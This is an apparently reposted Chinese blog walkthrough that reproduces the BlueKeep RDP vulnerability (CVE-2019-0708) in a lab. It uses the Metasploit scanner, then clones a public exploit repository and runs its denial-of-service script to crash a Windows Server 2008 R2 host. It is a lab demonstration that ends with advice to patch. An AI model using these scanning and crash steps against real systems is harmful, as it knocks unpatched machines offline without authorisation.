CVE-2019-0708漏洞復現


前言:

 

該漏洞前段時間已經熱鬧了好一陣子了,HW期間更是使用此漏洞來進行釣魚等一系列活動,可為大家也是對此漏洞的關心程度,接下里就簡單的演示下利用此漏洞進行DOS攻擊。當然還有RCE的操作,這只演示下藍屏DOS操作。

 

漏洞影響的操作系統:

  • Windows 2003
  • Windows XP
  • Windows Vista
  • Windows 7
  • Windows Server 2008
  • Windows Server 2008 R2

實驗環境:

parrot linux:10.10.202.8/24

Windows server 2008 R2: 10.10.202.9/24

 

首先進行掃描,此漏洞的前提開啟3389遠程桌面。

這里使用msf進行掃描,注意msf升級到最新的msf5

msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.202.9
rhosts => 10.10.202.9
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

 

接下來我們使用exp來進行攻擊

# git clone https://github.com/Ekultek/BlueKeep

# cd BlueKeep

# pip install -r requirements.txt

# ./setup.sh

執行完以上就順利安裝完成。我們進行攻擊下

執行payload:

└──╼ $sudo python bluekeep_weaponized_dos.py  -i 10.10.202.9

瞬間就掛了,可以看到漏洞還是很嚴重的,請各位還是盡快的打補丁吧!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM